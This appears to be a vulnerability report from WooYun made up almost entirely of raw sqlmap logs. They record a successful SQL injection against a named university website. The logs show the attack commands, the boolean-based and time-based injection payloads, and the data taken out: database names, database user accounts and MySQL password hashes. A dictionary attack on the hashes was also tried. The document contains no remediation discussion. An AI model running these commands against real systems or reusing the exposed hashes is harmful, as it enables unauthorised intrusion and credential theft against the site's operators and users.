WooYun.org

➜~» sqlmap -u 'http://youth.hznu.edu.cn/list_all.php?classid=46' -v 1 --dbs --batch                                                             [21:47:46]
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 21:54:57
[21:54:57] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn/session' as session file
[21:54:57] [INFO] testing connection to the target url
[21:55:01] [INFO] testing if the url is stable, wait a few seconds
[21:55:03] [INFO] url is stable
[21:55:03] [INFO] testing if GET parameter 'classid' is dynamic
[21:55:03] [INFO] confirming that GET parameter 'classid' is dynamic
[21:55:04] [INFO] GET parameter 'classid' is dynamic
[21:55:06] [WARNING] heuristic test shows that GET parameter 'classid' might not be injectable
[21:55:06] [INFO] testing sql injection on GET parameter 'classid'
[21:55:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:55:13] [INFO] GET parameter 'classid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[21:55:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[21:55:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:55:15] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[21:55:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:55:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:55:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[21:55:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[21:55:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:55:42] [INFO] GET parameter 'classid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[21:55:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:55:53] [INFO] target url appears to be UNION injectable with 7 columns
[21:56:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:56:14] [INFO] target url appears to be UNION injectable with 7 columns
[21:56:27] [INFO] GET parameter 'classid' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Place: GET
Parameter: classid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classid=46 AND 487=487
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: classid=46 AND SLEEP(5)
---
[21:56:27] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.8, PHP 5.2.5
back-end DBMS: MySQL 5.0.11
[21:56:27] [INFO] fetching database names
[21:56:27] [INFO] fetching number of databases
[21:56:27] [INFO] retrieved: 5
[21:56:35] [INFO] retrieved: information_schema
[21:59:25] [INFO] retrieved: cms
[22:00:07] [INFO] retrieved: mysql
[22:01:12] [INFO] retrieved: sqlweb_shida
[22:03:13] [INFO] retrieved: test
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] sqlweb_shida
[*] test
[22:04:09] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn'
[*] shutting down at: 22:04:09

➜0.9_1/libexec/output(master)» sqlmap -u 'http://youth.hznu.edu.cn/list_all.php?classid=46' --users --batch                                                                            
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 18:04:54
[18:04:54] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn/session' as session file
[18:04:54] [INFO] resuming injection data from session file
[18:04:54] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[18:04:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classid=46 AND 4559=4559
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: classid=46 AND SLEEP(5)
---
[18:04:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.8, PHP 5.2.5
back-end DBMS: MySQL 5.0.11
[18:04:55] [INFO] fetching database users
[18:04:55] [INFO] fetching number of database users
[18:04:55] [INFO] retrieved: 10
[18:05:11] [INFO] retrieved: 'root'@'localhost'
[18:08:19] [INFO] retrieved: 'root'@'production.mysql.com'
[18:12:39] [INFO] retrieved: 'root'@'127.0.0.1'
[18:15:31] [INFO] retrieved: 'web9429504'@'localhos[18:19:15] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
t'
[18:19:41] [INFO] retrieved: 'webtwei'@'127.0.0.1'
[18:22:18] [INFO] retrieved: 'webtwei'@'localhost'
[18:25:17] [INFO] retrieved: ''@'localhost'
[18:27:08] [INFO] retrieved: ''@'production.mysql.com'
[18:30:30] [INFO] retrieved: 'webtwei'@'%'
[18:32:24] [INFO] retrieved: 'xinshengweb'@'%'
database management system users [10]:
[*] ''@'localhost'
[*] ''@'production.mysql.com'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'production.mysql.com'
[*] 'web9429504'@'localhost'
[*] 'webtwei'@'%'
[*] 'webtwei'@'127.0.0.1'
[*] 'webtwei'@'localhost'
[*] 'xinshengweb'@'%'
[18:34:55] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn'
[*] shutting down at: 18:34:55

sqlmap -u 'http://youth.hznu.edu.cn/list_all.php?classid=46' --password --batch  [21:49:32]
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 22:05:48
[22:05:48] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn/session' as session file
[22:05:48] [INFO] resuming injection data from session file
[22:05:48] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[22:05:48] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classid=46 AND 487=487
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: classid=46 AND SLEEP(5)
---
[22:05:50] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.8, PHP 5.2.5
back-end DBMS: MySQL 5.0.11
[22:05:50] [INFO] fetching database users password hashes
[22:05:50] [INFO] fetching database users
[22:05:50] [INFO] fetching number of database users
[22:05:50] [INFO] retrieved: 10
[22:06:02] [INFO] retrieved: 'root'@'localhost'
[22:08:50] [INFO] retrieved: 'root'@'production.mysql.com'
[22:13:21] [INFO] retrieved: 'root'@'127.0.0.1'
[22:16:51] [INFO] retrieved: 'web9429504'[22:19:01] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
@'localhost'
[22:20:50] [INFO] retrieved: 'webtwei'@'127.0.0.1'
[22:23:58] [INFO] retrieved: 'webtwei'@'localhost'
[22:27:09] [INFO] retrieved: ''@'localhost'
[22:29:27] [INFO] retrieved: ''@'production.mysql.com'
[22:33:12] [INFO] retrieved: 'webtwei'@'%'
[22:35:10] [INFO] retrieved: 'xinshengweb'@'%'
[22:37:44] [INFO] fetching number of password hashes for user 'root'
[22:37:44] [INFO] retrieved: 2
[22:37:54] [INFO] fetching password hashes for user 'root'
[22:37:54] [INFO] retrieved: *27CF2F764E3D80D1D67FFEBC14DE47D0BF4A2585
[22:43:52] [INFO] retrieved:
[22:44:00] [INFO] fetching number of password hashes for user 'web9429504'
[22:44:00] [INFO] retrieved: 1
[22:44:07] [INFO] fetching password hashes for user 'web9429504'
[22:44:07] [INFO] retrieved: *C39F1ACA5818C37CEFA20F30422A14720CCB5092
[22:49:39] [INFO] fetching number of password hashes for user 'webtwei'
[22:49:39] [INFO] retrieved: 1
[22:49:44] [INFO] fetching password hashes for user 'webtwei'
[22:49:44] [INFO] retrieved: *BE89FA3840700821F13FBC67F65BDCB315531F81
[22:55:27] [INFO] fetching number of password hashes for user 'xinshengweb'
[22:55:27] [INFO] retrieved: 1
[22:55:33] [INFO] fetching password hashes for user 'xinshengweb'
[22:55:33] [INFO] retrieved: *[22:56:15] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
427DF445[22:57:43] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
3F376141948E0DE24EC8566C7D3AE6A2
[23:02:09] [INFO] do you want to use dictionary attack on retrieved password hashes? [Y/n/q] Y
[23:02:09] [INFO] using hash method: 'mysql_passwd'
[23:02:09] [INFO] what's the dictionary's location? [/usr/local/Cellar/sqlmap/0.9_1/libexec/txt/wordlist.txt] /usr/local/Cellar/sqlmap/0.9_1/libexec/txt/wordlist.txt
[23:02:09] [INFO] loading dictionary from: '/usr/local/Cellar/sqlmap/0.9_1/libexec/txt/wordlist.txt'
[23:02:09] [INFO] do you want to use common password suffixes? (slow!) [y/N] N
[23:02:09] [INFO] starting dictionary attack (mysql_passwd)
[23:02:12] [WARNING] no clear password(s) found
database management system users password hashes:
[*] root [2]:
    password hash: *27CF2F764E3D80D1D67FFEBC14DE47D0BF4A2585
    password hash: NULL
[*] web9429504 [1]:
    password hash: *C39F1ACA5818C37CEFA20F30422A14720CCB5092
[*] webtwei [1]:
    password hash: *BE89FA3840700821F13FBC67F65BDCB315531F81
[*] xinshengweb [1]:
    password hash: *427DF4453F376141948E0DE24EC8566C7D3AE6A2
[23:02:12] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/youth.hznu.edu.cn'